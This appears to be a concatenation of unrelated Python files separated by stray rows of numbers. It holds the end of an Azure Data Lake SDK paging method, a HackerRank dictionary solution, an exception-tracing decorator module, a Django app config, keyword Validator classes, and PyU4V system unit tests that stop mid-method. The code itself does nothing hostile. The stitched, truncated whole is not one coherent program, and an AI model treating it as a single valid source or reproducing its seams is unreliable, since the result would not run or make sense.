         the matching resources included with the resources in the response,
         e.g. Categories?$count=true. Optional.
        :type count: bool
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of :class:`DataLakeStoreAccountInfo
         <azure.mgmt.datalake.analytics.account.models.DataLakeStoreAccountInfo>`
        :rtype: :class:`DataLakeStoreAccountInfoPaged
         <azure.mgmt.datalake.analytics.account.models.DataLakeStoreAccountInfoPaged>`
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Page fetcher handed to the Paged iterator: builds the initial URL
        # (with the OData query options) on the first call, then follows the
        # service-provided next_link on subsequent calls.
        def internal_paging(next_link=None, raw=False):
            if not next_link:
                # Construct URL
                url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeAnalytics/accounts/{accountName}/DataLakeStoreAccounts/'
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'accountName': self._serialize.url("account_name", account_name, 'str'),
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}
                if filter is not None:
                    query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
                if top is not None:
                    query_parameters['$top'] = self._serialize.query("top", top, 'int', minimum=1)
                if skip is not None:
                    query_parameters['$skip'] = self._serialize.query("skip", skip, 'int', minimum=1)
                if select is not None:
                    query_parameters['$select'] = self._serialize.query("select", select, 'str')
                if orderby is not None:
                    query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
                if count is not None:
                    query_parameters['$count'] = self._serialize.query("count", count, 'bool')
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            else:
                url = next_link
                query_parameters = {}
            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, **operation_config)
            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
            return response
        # Deserialize response
        deserialized = models.DataLakeStoreAccountInfoPaged(internal_paging, self._deserialize.dependencies)
        if raw:
            header_dict = {}
            client_raw_response = models.DataLakeStoreAccountInfoPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response
        return deserialized
| 17,700 | 4,643 |
# Enter your code here. Read input from STDIN. Print output to STDOUT
from collections import defaultdict
# Read the group-A word count (n) and query count (m), then record the
# 1-based positions at which each group-A word occurs.  For each query,
# print the space-joined occurrence list, or -1 when the word never appeared.
group_count, query_count = map(int, input().split())
occurrences = {}
for position in range(1, group_count + 1):
    word = input()
    if word in occurrences:
        occurrences[word] += ' ' + str(position)
    else:
        occurrences[word] = str(position)
for _ in range(query_count):
    print(occurrences.get(input(), -1))
| 317 | 118 |
# -*- coding: utf-8 -*-
# Copyright (c) 2022, KarjaKAK
# All rights reserved.
from functools import wraps
from textwrap import fill
from contextlib import redirect_stdout
from datetime import datetime as dt
import io, inspect, os, sys
__all__ = ['']
# NOTE(review): ``__all__`` containing a single empty string exports nothing
# usable via ``from excptr import *`` — presumably it should list the public
# names (excp, excpcls, ...); confirm intent before changing.
# Per-user base directory: %USERPROFILE% on Windows, $HOME elsewhere.
DIRPATH = (
    os.environ["USERPROFILE"] if sys.platform.startswith("win") else os.environ["HOME"]
)
# Default directory and timestamped log file used by the log-to-file mode.
DEFAULTDIR = os.path.join(DIRPATH, "EXCPTR")
DEFAULTFILE = os.path.join(
    DEFAULTDIR, f"{int(dt.timestamp(dt.today().replace(microsecond=0)))}_EXCPTR.log"
)
def defd():
    """Create the default EXCPTR directory.

    Raises a generic Exception when the directory already exists, so the
    caller learns that nothing was created.
    """
    if os.path.isdir(DEFAULTDIR):
        raise Exception(f"{DEFAULTDIR} is already exist!")
    os.mkdir(DEFAULTDIR)
def prex(details, exc_tr, fc_name):
    """Print a formatted, two-part trace of a caught exception.

    First the outer call chain (*details*, frames leading to the decorated
    call), then the inner frames walked from the exception's traceback.

    :param details: ``inspect.FrameInfo`` sequence of caller frames.
    :param exc_tr: the caught exception instance.
    :param fc_name: name of the decorated function that raised.
    """
    print(f"\nFilename caller: {details[0].filename.upper()}\n")
    print(f"ERROR - <{fc_name}>:")
    print(f"{'-' * 70}", end="\n")
    print("Start at:\n")
    filenm = details[0].filename
    for detail in details:
        # Skip frames that belong to this module's own machinery.
        if "excptr.py" not in detail.filename:
            # Announce the file only when it differs from the caller's file.
            if filenm != detail.filename:
                print(f"Filename: {detail.filename.upper()}\n")
            cc = fill(
                "".join(detail.code_context).strip(),
                initial_indent=" " * 4,
                subsequent_indent=" " * 4,
            )
            print(f"line {detail.lineno} in {detail.function}:\n" f"{cc}\n")
            del cc
    del detail
    tot = f">>>- Exception raise: {exc_tr.__class__.__name__} ->"
    print("~" * len(tot))
    print(tot)
    print("~" * len(tot) + "\n")
    # Inner frames: everything between the decorated call and the raise site.
    allextr = inspect.getinnerframes(exc_tr.__traceback__)[1:]
    for extr in allextr:
        if "excptr.py" not in extr.filename:
            if filenm != extr.filename:
                print(f"Filename: {extr.filename.upper()}\n")
            cc = fill(
                "".join(extr.code_context).strip(),
                initial_indent=" " * 4,
                subsequent_indent=" " * 4,
            )
            print(f"line {extr.lineno} in {extr.function}:\n" f"{cc}\n")
            del cc
    del extr
    print(f"{exc_tr.__class__.__name__}: {exc_tr.args[0]}")
    print(f"{'-' * 70}", end="\n")
    del tot, allextr, filenm, details, exc_tr, fc_name
def crtk(v: str):
    """Display the trace text *v* in a topmost, auto-expiring Tkinter window.

    Every few seconds the user is asked whether to keep viewing; total
    viewing time is capped (the prompt escalates until it force-closes).
    """
    import tkinter as tk
    from tkinter import messagebox as msg
    root = tk.Tk()
    root.title("Exception Error Messages")
    root.attributes("-topmost", 1)
    text = tk.Listbox(root, relief=tk.FLAT, width=70, selectbackground="light green")
    text.pack(side="left", expand=1, fill=tk.BOTH, pady=2, padx=(2, 0))
    scr = tk.Scrollbar(root, orient=tk.VERTICAL)
    scr.pack(side="right", fill=tk.BOTH)
    scr.config(command=text.yview)
    text.config(yscrollcommand=scr.set)
    # One listbox row per line of the trace text.
    val = v.splitlines()
    for v in val:
        text.insert(tk.END, v)
    text.config(
        state=tk.DISABLED,
        bg="grey97",
        disabledforeground="black",
        font="courier 12",
        height=len(val),
    )
    del val, v
    # Milliseconds until the next keep-viewing prompt; grows each round.
    scnd = 5000
    def viewing():
        nonlocal scnd
        # Double the interval while under 20s, then add 5s per round.
        scnd += scnd if scnd < 20000 else 5000
        match scnd:
            case sec if sec <= 25000:
                ans = msg.askyesno(
                    "Viewing",
                    f"Still viewing for another {scnd//1000} seconds?",
                    parent=root,
                )
                if ans:
                    root.after(scnd, viewing)
                else:
                    root.destroy()
            case sec if sec > 25000:
                # Hard cap reached: inform the user and close the window.
                msg.showinfo(
                    "Viewing", "Viewing cannot exceed more than 1 minute!", parent=root
                )
                root.destroy()
    root.after(5000, viewing)
    root.mainloop()
    del root, text, scr, scnd
def ckrflex(filenm: str) -> bool:
    """Return True when *filenm* does not exist or its first line is empty.

    Used to decide whether a log file is fresh (no separator needed before
    appending the next entry).
    """
    if not os.path.exists(filenm):
        return True
    with open(filenm) as handle:
        return not handle.readline()
def excp(m: int = -1, filenm: str = None):
    """Decorator that intercepts exceptions raised by the wrapped function.

    :param m: reporting mode — -1 re-raise unchanged (default), 0 print the
        formatted trace, 1 show it in a Tkinter window, 2 append it to
        *filenm*.
    :param filenm: log-file path; must be truthy when m == 2, otherwise the
        exception is re-raised.
    :raises ValueError: if *m* is not an int in {-1, 0, 1, 2}.
    """
    match m:
        case m if not isinstance(m, int):
            raise ValueError(f'm = "{m}" Need to be int instead!')
        case m if m not in [-1, 0, 1, 2]:
            raise ValueError(
                f'm = "{m}" Need to be either one of them, [-1 or 0 or 1 or 2]!'
            )
    def ckerr(f):
        # Bind the validated mode into the wrapper's closure.
        ckb = m
        @wraps(f)
        def trac(*args, **kwargs):
            try:
                # NOTE(review): falsy results (0, '', False, None) are not
                # returned — the wrapper yields None for them; confirm intended.
                if fn := f(*args, **kwargs):
                    return fn
                del fn
            except Exception as e:
                # Outer frames, oldest first, leading up to this call.
                details = inspect.stack()[1:][::-1]
                match ckb:
                    case -1:
                        raise
                    case 0:
                        prex(details, e, f.__name__)
                    case 1:
                        # Capture the printed trace, then display it in a GUI.
                        v = io.StringIO()
                        with redirect_stdout(v):
                            prex(details, e, f.__name__)
                        crtk(v.getvalue())
                        v.flush()
                    case 2:
                        if filenm:
                            v = io.StringIO()
                            with redirect_stdout(v):
                                prex(details, e, f.__name__)
                            # Timestamp header; prepend a blank separator line
                            # unless the log file is new/empty.
                            wrm = (
                                str(dt.today()).rpartition(".")[0]
                                + ": TRACING EXCEPTION\n"
                                if ckrflex(filenm)
                                else "\n"
                                + str(dt.today()).rpartition(".")[0]
                                + ": TRACING EXCEPTION\n"
                            )
                            with open(filenm, "a") as log:
                                log.write(wrm)
                                log.write(v.getvalue())
                            v.flush()
                            del v, wrm
                        else:
                            # No log file configured -> fall back to re-raising.
                            raise
                del details, e
        return trac
    return ckerr
def excpcls(m: int = -1, filenm: str = None):
    """Class decorator wrapping every plain function attribute with excp().

    Validates *m* exactly like excp(); the returned decorator rejects
    non-class targets and rebinds each function found in the class body to
    its excp-wrapped equivalent.

    :raises ValueError: if *m* is not an int in {-1, 0, 1, 2}.
    """
    if not isinstance(m, int):
        raise ValueError(f'm = "{m}" Need to be int instead!')
    if m not in [-1, 0, 1, 2]:
        raise ValueError(
            f'm = "{m}" Need to be either one of them, [-1 or 0 or 1 or 2]!'
        )

    def catchcall(cls):
        mode = m
        if not inspect.isclass(cls):
            raise TypeError("Type error, suppose to be a class!")
        for attr_name, attr_value in vars(cls).items():
            if inspect.isfunction(attr_value):
                # Replace the function in-place with its wrapped version.
                setattr(cls, attr_name, excp(mode, filenm)(attr_value))
        return cls

    return catchcall
| 6,966 | 2,174 |
from django.apps import AppConfig
class ImsConfig(AppConfig):
    """Django AppConfig for the ``ims`` application (as listed in INSTALLED_APPS)."""
    name = 'ims'
| 81 | 27 |
class Validator(object):
    """Named pairing of a check predicate with an action callback.

    Calling the instance delegates to its ``check`` callable.  ``set``
    returns a decorator that rebinds either ``check`` or ``action`` to the
    decorated function.
    """

    def __init__(self, name, check=None, action=None):
        """Derive ``name`` as '<name>_validator' and store the callables."""
        self.name = '{0}_validator'.format(name)
        self.check = check
        self.action = action

    def __call__(self, message):
        """Run the check predicate against *message* and return its result."""
        return self.check(message)

    def set(self, action):
        """Return a decorator binding a function as 'check' or 'action'.

        :raises TypeError: for any other attribute name.
        """
        if action not in ('check', 'action'):
            raise TypeError('Invalid action name. Must be "check" or "action".')

        def wrapper(func):
            setattr(self, action, func)
            return func

        return wrapper
class KeywordValidator(Validator):
    """Validator that matches ``message.text`` against a keyword, ignoring case."""

    def __init__(self, name, action=None):
        def matches_keyword(message):
            # Case-insensitive comparison of the keyword with the message body.
            return name.lower() == message.text.lower()

        super(KeywordValidator, self).__init__(name, matches_keyword, action)
| 772 | 216 |
# Copyright (c) 2020 Dell Inc. or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test_pyu4v_system.py."""
import testtools
import time
from pathlib import Path
from unittest import mock
from unittest.mock import MagicMock
from PyU4V import common
from PyU4V import rest_requests
from PyU4V.tests.unit_tests import pyu4v_common_data as pcd
from PyU4V.tests.unit_tests import pyu4v_fakes as pf
from PyU4V import univmax_conn
from PyU4V.utils import constants
from PyU4V.utils import exception
from PyU4V.utils import file_handler
# Short aliases for PyU4V constants and shared fixture data used by the
# system tests in this module.
ARRAY_ID = constants.ARRAY_ID
ARRAY_NUM = constants.ARRAY_NUM
HEALTH = constants.HEALTH
HEALTH_CHECK = constants.HEALTH_CHECK
SG_ID = constants.SG_ID
SG_NUM = constants.SG_NUM
SYMMETRIX = constants.SYMMETRIX
SYSTEM = constants.SYSTEM
LOCAL_USER = constants.LOCAL_USER
TAG = constants.TAG
TAG_NAME = constants.TAG_NAME
ALERT_ID = pcd.CommonData.alert_id  # sample alert id from the common test data
ALERT = constants.ALERT
AUDIT_LOG_RECORD = constants.AUDIT_LOG_RECORD
EXPORT_FILE = constants.EXPORT_FILE
AUDIT_LOG_FILENAME = constants.AUDIT_LOG_FILENAME
SUCCESS = constants.SUCCESS
BINARY_DATA = constants.BINARY_DATA
AUDIT_RECORD_PATH = constants.AUDIT_RECORD_PATH
class PyU4VSystemTest(testtools.TestCase):
"""Test System."""
def setUp(self):
"""Setup."""
super(PyU4VSystemTest, self).setUp()
self.data = pcd.CommonData()
self.conf_file, self.conf_dir = (
pf.FakeConfigFile.create_fake_config_file())
univmax_conn.file_path = self.conf_file
with mock.patch.object(
rest_requests.RestRequests, 'establish_rest_session',
return_value=pf.FakeRequestsSession()):
self.conn = univmax_conn.U4VConn(array_id=self.data.array)
self.common = self.conn.common
self.system = self.conn.system
def test_get_system_health(self):
"""Test get_system_health."""
health_check_result = self.system.get_system_health()
self.assertEqual(self.data.array_health, health_check_result)
def test_list_system_health_check(self):
"""Test list_system_health_checks."""
health_check_list = self.system.list_system_health_check()
self.assertEqual(self.data.array_health_check_list, health_check_list)
def test_get_health_check_details(self):
"""Test get_health_check_details."""
health_check = self.system.get_health_check_details(health_check_id=1)
self.assertEqual(self.data.health_check_response, health_check)
def test_perform_health_check(self):
"""Test perform_health_check."""
run_test = self.system.perform_health_check()
self.assertEqual(run_test, self.data.perform_health_check_response)
def test_delete_health_check(self):
"""Test delete_health_check."""
common.CommonFunctions.delete_resource = MagicMock(
side_effect=self.common.delete_resource)
self.system.delete_health_check(health_check_id=1)
common.CommonFunctions.delete_resource.assert_called_once_with(
category=SYSTEM, resource_level=SYMMETRIX,
resource_level_id=self.conn.array_id, resource_type=HEALTH,
resource_type_id=HEALTH_CHECK, object_type=1)
def test_get_disk_id_list(self):
"""Test get_disk_id_list."""
disk_list = self.system.get_disk_id_list(failed=True)
self.assertEqual(self.data.disk_list, disk_list)
def test_get_disk_details(self):
"""Test get_disk_details."""
disk_info = self.system.get_disk_details(disk_id='1')
self.assertEqual(self.data.disk_info, disk_info)
def test_get_tags(self):
"""Test get_tags."""
common.CommonFunctions.get_resource = MagicMock(
side_effect=self.common.get_resource)
tag_list = self.system.get_tags(
array_id=self.conn.array_id, tag_name='UNIT-TEST',
storage_group_id='TEST-SG', num_of_storage_groups=1,
num_of_arrays=3)
common.CommonFunctions.get_resource.assert_called_once_with(
category=SYSTEM, resource_level=TAG, params={
ARRAY_ID: self.conn.array_id, TAG_NAME: 'UNIT-TEST',
SG_ID: 'TEST-SG', SG_NUM: '1', ARRAY_NUM: '3'})
self.assertEqual(self.data.tag_list, tag_list)
def test_get_tagged_objects(self):
"""Test get_tagged_objects."""
tagged_objects = self.system.get_tagged_objects(tag_name='UNIT-TEST')
self.assertEqual(self.data.tagged_objects, tagged_objects)
def test_get_alert_summary(self):
"""Test get_alert_summary."""
alert_summary = self.system.get_alert_summary()
self.assertEqual(self.data.alert_summary, alert_summary)
def test_get_alert_ids(self):
"""Test get_alert_ids."""
alert_ids = self.system.get_alert_ids(
array='123456789', _type='Server', severity='Warning', state='New',
created_date='1234455', _object='BE', object_type='Director',
acknowledged=True, description='Alert')
self.assertEqual(self.data.alert_list['alertId'], alert_ids)
def test_get_alert_details(self):
"""Test get_alert_details."""
alert_details = self.system.get_alert_details(
alert_id=ALERT_ID)
self.assertEqual(self.data.alert_details, alert_details)
@mock.patch.object(common.CommonFunctions, 'modify_resource')
def test_acknowledge_alert(self, mck_modify):
"""Test acknowledge_alert."""
ref_payload = {'editAlertActionParam': 'ACKNOWLEDGE'}
self.system.acknowledge_alert(alert_id=ALERT_ID)
mck_modify.assert_called_once_with(
category=SYSTEM, resource_level=ALERT,
resource_level_id=ALERT_ID, payload=ref_payload)
@mock.patch.object(common.CommonFunctions, 'delete_resource')
def test_delete_alert(self, mck_delete):
"""Test delete_alert."""
self.system.delete_alert(alert_id=ALERT_ID)
mck_delete.assert_called_once_with(
category=SYSTEM, resource_level=ALERT, resource_level_id=ALERT_ID)
@mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_settings_success_return_binary(self, mck_dl):
"""Test _download_settings success binary data returned."""
response = self.system._download_settings(request_body=dict(),
return_binary=True)
mck_dl.assert_called_once_with(
category=constants.SYSTEM, resource_level=constants.SETTINGS,
resource_type=constants.EXPORT_FILE, payload=dict())
self.assertTrue(response['success'])
self.assertIn('binary_data', response.keys())
self.assertEqual(b'test_binary_data', response['binary_data'])
@mock.patch('builtins.open', new_callable=mock.mock_open)
@mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_settings_success_write_file(self, mck_dl, mck_open):
"""Test _download_settings success"""
response = self.system._download_settings(request_body=dict())
mck_dl.assert_called_once_with(
category=constants.SYSTEM, resource_level=constants.SETTINGS,
resource_type=constants.EXPORT_FILE, payload=dict())
mck_open.assert_called_once()
self.assertTrue(response['success'])
self.assertIn(str(Path.cwd()), str(response['settings_path']))
self.assertIn(constants.SETTINGS_FILENAME_TEMPLATE,
str(response['settings_path']))
@mock.patch('builtins.open', new_callable=mock.mock_open)
@mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_settings_success_write_file_custom_path(self, mck_dl,
mck_open):
"""Test _download_settings success"""
response = self.system._download_settings(
request_body=dict(), file_name='test', dir_path=Path.home())
mck_dl.assert_called_once_with(
category=constants.SYSTEM, resource_level=constants.SETTINGS,
resource_type=constants.EXPORT_FILE, payload=dict())
mck_open.assert_called_once()
self.assertTrue(response['success'])
self.assertIn(str(Path.home()), str(response['settings_path']))
self.assertIn('test.zip', str(response['settings_path']))
@mock.patch.object(common.CommonFunctions, 'download_file',
                   return_value=None)
def test_download_settings_fail_no_response(self, mck_dl):
    """Test _download_settings returns failure when the API returns nothing."""
    response = self.system._download_settings(request_body=dict())
    mck_dl.assert_called_once_with(
        category=constants.SYSTEM, resource_level=constants.SETTINGS,
        resource_type=constants.EXPORT_FILE, payload=dict())
    # No response object means no file or binary data, only a failure flag.
    self.assertEqual({'success': False}, response)
@mock.patch.object(
    common.CommonFunctions, 'download_file',
    return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_settings_dir_path_exception(self, mck_dl):
    """Test _download_settings raises when dir_path does not exist."""
    self.assertRaises(
        exception.InvalidInputException,
        self.system._download_settings,
        request_body=dict(), dir_path='fake')
    # The download call itself is still made before path validation fails.
    mck_dl.assert_called_once_with(
        category=constants.SYSTEM, resource_level=constants.SETTINGS,
        resource_type=constants.EXPORT_FILE, payload=dict())
def test_download_all_settings(self):
    """Test download_all_settings delegates to _download_settings."""
    expected_body = {
        constants.FILE_PASSWORD: 'test_password',
        constants.SRC_ARRAY: self.data.remote_array}
    with mock.patch.object(
            self.system, '_download_settings') as mock_download:
        self.system.download_all_settings(
            file_password='test_password', dir_path='/test/file/path',
            file_name='test_filename', array_id=self.data.remote_array,
            return_binary=True)
        mock_download.assert_called_once_with(
            request_body=expected_body, dir_path='/test/file/path',
            file_name='test_filename', return_binary=True)
def test_download_unisphere_settings_1_2_params(self):
    """Test download_unisphere_settings excluding alert/perf-pref settings."""
    expected_body = {
        constants.FILE_PASSWORD: 'test_password',
        constants.SRC_ARRAY: self.conn.array_id,
        constants.EXCLUDE_SYS_SETTINGS: [constants.ALL_SETTINGS],
        constants.EXCLUDE_UNI_SETTINGS: [constants.UNI_ALERT_SETTINGS,
                                         constants.UNI_PERF_PREF_SETTINGS]}
    with mock.patch.object(
            self.system, '_download_settings') as mock_download:
        self.system.download_unisphere_settings(
            file_password='test_password', dir_path='/test/file/path',
            file_name='test_filename', return_binary=True,
            exclude_alert_notification_settings=True,
            exclude_performance_preference_settings=True)
        mock_download.assert_called_once_with(
            request_body=expected_body, dir_path='/test/file/path',
            file_name='test_filename', return_binary=True)
def test_download_unisphere_settings_3_4_params(self):
    """Test download_unisphere_settings excluding perf templates/metrics."""
    expected_body = {
        constants.FILE_PASSWORD: 'test_password',
        constants.SRC_ARRAY: self.conn.array_id,
        constants.EXCLUDE_SYS_SETTINGS: [constants.ALL_SETTINGS],
        constants.EXCLUDE_UNI_SETTINGS: [
            constants.UNI_PERF_USER_SETTINGS,
            constants.UNI_PERF_METRIC_SETTINGS]}
    with mock.patch.object(
            self.system, '_download_settings') as mock_download:
        self.system.download_unisphere_settings(
            file_password='test_password', dir_path='/test/file/path',
            file_name='test_filename', return_binary=True,
            exclude_performance_user_templates=True,
            exclude_performance_metric_settings=True)
        mock_download.assert_called_once_with(
            request_body=expected_body, dir_path='/test/file/path',
            file_name='test_filename', return_binary=True)
def test_download_unisphere_settings_all_excluded_exception(self):
    """Test download_unisphere_settings raises when everything is excluded."""
    with self.assertRaises(exception.InvalidInputException):
        self.system.download_unisphere_settings(
            file_password='test', exclude_alert_notification_settings=True,
            exclude_performance_preference_settings=True,
            exclude_performance_user_templates=True,
            exclude_performance_metric_settings=True)
def test_download_system_settings_1_2_params(self):
    """Test download_system_settings excluding alert policy/notification."""
    expected_body = {
        constants.FILE_PASSWORD: 'test_password',
        constants.SRC_ARRAY: self.data.remote_array,
        constants.EXCLUDE_SYS_SETTINGS: [
            constants.SYS_ALERT_SETTINGS,
            constants.SYS_ALERT_NOTIFI_SETTINGS],
        constants.EXCLUDE_UNI_SETTINGS: [constants.ALL_SETTINGS]}
    with mock.patch.object(
            self.system, '_download_settings') as mock_download:
        self.system.download_system_settings(
            file_password='test_password', dir_path='/test/file/path',
            file_name='test_filename', array_id=self.data.remote_array,
            return_binary=True, exclude_alert_policy_settings=True,
            alert_level_notification_settings=True)
        mock_download.assert_called_once_with(
            request_body=expected_body, dir_path='/test/file/path',
            file_name='test_filename', return_binary=True)
def test_download_system_settings_3_4_params(self):
    """Test download_system_settings excluding system/perf thresholds."""
    expected_body = {
        constants.FILE_PASSWORD: 'test_password',
        constants.SRC_ARRAY: self.data.remote_array,
        constants.EXCLUDE_SYS_SETTINGS: [
            constants.SYS_THRESH_SETTINGS,
            constants.SYS_PERF_THRESH_SETTINGS],
        constants.EXCLUDE_UNI_SETTINGS: [constants.ALL_SETTINGS]}
    with mock.patch.object(
            self.system, '_download_settings') as mock_download:
        self.system.download_system_settings(
            file_password='test_password', dir_path='/test/file/path',
            file_name='test_filename', array_id=self.data.remote_array,
            return_binary=True, exclude_system_threshold_settings=True,
            exclude_performance_threshold_settings=True)
        mock_download.assert_called_once_with(
            request_body=expected_body, dir_path='/test/file/path',
            file_name='test_filename', return_binary=True)
def test_download_system_settings_all_excluded_exception(self):
    """Test download_system_settings raises when everything is excluded."""
    with self.assertRaises(exception.InvalidInputException):
        self.system.download_system_settings(
            file_password='test', exclude_alert_policy_settings=True,
            alert_level_notification_settings=True,
            exclude_system_threshold_settings=True,
            exclude_performance_threshold_settings=True)
@mock.patch.object(common.CommonFunctions, 'upload_file')
@mock.patch('builtins.open', return_value=__file__)
def test_upload_settings(self, mck_open, mck_up):
    """Test upload_settings success when given a file path."""
    # Expected multipart form contents for the settings import call.
    ref_form_data = {
        constants.ZIP_FILE: __file__,
        constants.TGT_ARRAYS: self.data.remote_array,
        constants.FILE_PASSWORD: 'test_password'}
    self.system.upload_settings(file_password='test_password',
                                file_path=__file__,
                                array_id=self.data.remote_array)
    mck_up.assert_called_once_with(
        category=constants.SYSTEM,
        resource_level=constants.SETTINGS,
        resource_type=constants.IMPORT_FILE,
        form_data=ref_form_data)
@mock.patch.object(common.CommonFunctions, 'upload_file')
def test_upload_settings_binary_data(self, mck_up):
    """Test upload_settings success when given raw binary data."""
    # When no array_id is supplied the connection's array is the target.
    ref_form_data = {
        constants.ZIP_FILE: b'test_binary_data',
        constants.TGT_ARRAYS: self.conn.array_id,
        constants.FILE_PASSWORD: 'test_password'}
    self.system.upload_settings(file_password='test_password',
                                binary_data=b'test_binary_data')
    mck_up.assert_called_once_with(
        category=constants.SYSTEM,
        resource_level=constants.SETTINGS,
        resource_type=constants.IMPORT_FILE,
        form_data=ref_form_data)
def test_upload_settings_path_exception(self):
    """Test upload_settings raises when the file path does not exist."""
    with self.assertRaises(exception.InvalidInputException):
        self.system.upload_settings(file_password='test',
                                    file_path='/fake')
def test_upload_settings_invalid_data_type(self):
    """Test upload_settings rejects binary_data that is not bytes."""
    with self.assertRaises(exception.InvalidInputException):
        self.system.upload_settings(file_password='test',
                                    binary_data='/fake')
def test_get_audit_log_list(self):
    """Test get_audit_log_list success with every filter supplied."""
    end = int(time.time())
    # A window of 24 hours + 1 second triggers the LOG warning path.
    start = end - (60 * 60 * 24 + 1)
    audit_logs = self.system.get_audit_log_list(
        start_time=start, end_time=end, array_id='test', user_name='test',
        host_name='test', client_host='test', message='test',
        record_id='test', activity_id='test', application_id='test',
        application_version='test', task_id='test', process_id='test',
        vendor_id='test', os_type='test', os_revision='test',
        api_library='test', api_version='test', audit_class='test',
        action_code='test', function_class='test')
    self.assertIsInstance(audit_logs, list)
    self.assertTrue(audit_logs)
@mock.patch.object(common.CommonFunctions, 'get_request',
                   return_value={'count': 0})
def test_get_audit_log_list_no_content(self, mck_get):
    """Test get_audit_log_list returns an empty list when count is zero."""
    # Note: docstring previously said "upload_settings" -- copy/paste error.
    end = int(time.time())
    start = end
    response = self.system.get_audit_log_list(
        start_time=start, end_time=end)
    self.assertFalse(response)
    self.assertIsInstance(response, list)
def test_get_audit_log_record(self):
    """Test get_audit_log_record returns a populated dict."""
    record = self.system.get_audit_log_record(record_id='test')
    self.assertIsInstance(record, dict)
    self.assertTrue(record)
@mock.patch.object(
    common.CommonFunctions, 'download_file',
    return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_audit_log_record_return_binary(self, mck_dl):
    """Test download_audit_log_record returns binary data when requested."""
    ref_req_body = {AUDIT_LOG_FILENAME: 'test'}
    response = self.system.download_audit_log_record(
        file_name='test', return_binary=True)
    mck_dl.assert_called_once_with(
        category=SYSTEM, resource_level=SYMMETRIX,
        resource_level_id=self.system.array_id,
        resource_type=AUDIT_LOG_RECORD, resource=EXPORT_FILE,
        payload=ref_req_body)
    self.assertTrue(response[SUCCESS])
    self.assertIn(BINARY_DATA, response.keys())
    self.assertEqual(b'test_binary_data', response[BINARY_DATA])
@mock.patch.object(file_handler, 'write_binary_data_to_file',
                   return_value='/test/test.pdf')
def test_download_audit_log_record_write_file(self, mck_write):
    """Test download_audit_log_record writes the record to a PDF file."""
    ref_response = pf.FakeResponse(200, dict(),
                                   content=b'test_binary_data')
    with mock.patch.object(
            common.CommonFunctions, 'download_file',
            return_value=ref_response) as mck_dl:
        ref_req_body = {AUDIT_LOG_FILENAME: 'test'}
        response = self.system.download_audit_log_record(
            file_name='test', dir_path='test')
        mck_dl.assert_called_once_with(
            category=SYSTEM, resource_level=SYMMETRIX,
            resource_level_id=self.system.array_id,
            resource_type=AUDIT_LOG_RECORD, resource=EXPORT_FILE,
            payload=ref_req_body)
        # The raw response object is handed to the file writer as a PDF.
        mck_write.assert_called_once_with(
            data=ref_response, file_extension=constants.PDF_SUFFIX,
            file_name='test', dir_path='test')
        self.assertTrue(response[SUCCESS])
        self.assertIn('/test/test.pdf', str(response[AUDIT_RECORD_PATH]))
@mock.patch.object(file_handler, 'write_binary_data_to_file',
                   return_value='/test/test.pdf')
def test_download_audit_log_record_write_file_no_name(self, mck_write):
    """Test download_audit_log_record with no file name provided."""
    ref_response = pf.FakeResponse(200, dict(),
                                   content=b'test_binary_data')
    with mock.patch.object(
            common.CommonFunctions, 'download_file',
            return_value=ref_response) as mck_dl:
        # Only call counts are asserted here; the generated name is
        # not predictable from the test's side.
        response = self.system.download_audit_log_record()
        mck_dl.assert_called_once()
        mck_write.assert_called_once()
        self.assertTrue(response[SUCCESS])
        self.assertIn('/test/test.pdf', str(response[AUDIT_RECORD_PATH]))
def test_get_director_list(self):
    """Test get_director_list returns every known director."""
    directors = self.system.get_director_list(array_id=self.data.array)
    self.assertIsInstance(directors, list)
    self.assertTrue(directors)
    self.assertEqual([self.data.director_id1, self.data.director_id2],
                     directors)
def test_get_iscsi_director_list(self):
    """Test get_director_list with iscsi_only=True filters directors."""
    iscsi_directors = self.system.get_director_list(
        array_id=self.data.array, iscsi_only=True)
    self.assertIsInstance(iscsi_directors, list)
    self.assertTrue(iscsi_directors)
    self.assertEqual([self.data.director_id2], iscsi_directors)
def test_get_director_port_list(self):
    """Test get_director_port_list for a non-iSCSI director."""
    ports = self.system.get_director_port_list(
        director_id=self.data.director_id1, iscsi_target=False)
    self.assertIsInstance(ports, list)
    self.assertTrue(ports)
    self.assertEqual(self.data.port_key_list.get('symmetrixPortKey'),
                     ports)
def test_get_ip_interface_list(self):
    """Test get_ip_interface_list for a director port."""
